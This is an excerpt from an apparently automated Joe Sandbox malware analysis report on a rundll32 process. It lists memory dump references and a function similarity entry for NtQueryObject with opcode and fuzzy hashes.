                                                                              • Associated: 0000000B.00000002.3506396105.0000000004858000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506441791.000000000485E000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506493168.000000000485F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506537867.0000000004866000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506572168.000000000486A000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506616726.000000000486C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506660902.000000000486D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 0000000B.00000002.3506660902.000000000486F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_11_2_4630000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: AddressHandleModuleProc
                                                                              • String ID: NTDLL.DLL$NtQueryObject
                                                                              • API String ID: 1646373207-3865875859
                                                                              • Opcode ID: 32e55d343e7dbb73099c0b3f4e52aa38c1274935167546b0f482ce3ad4f1dfec
                                                                              • Instruction ID: 1df1ed02c02e72e7f1aae1025bb60b8b7c95b6e46d9bd6bec6acd7346959d8a7
                                                                              • Opcode Fuzzy Hash: 32e55d343e7dbb73099c0b3f4e52aa38c1274935167546b0f482ce3ad4f1dfec
                                                                              • Instruction Fuzzy Hash: 64110471644204BFEB10EB94FC56B5EB3EDE749B16F1004A5F504E3290E775BD408E98
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%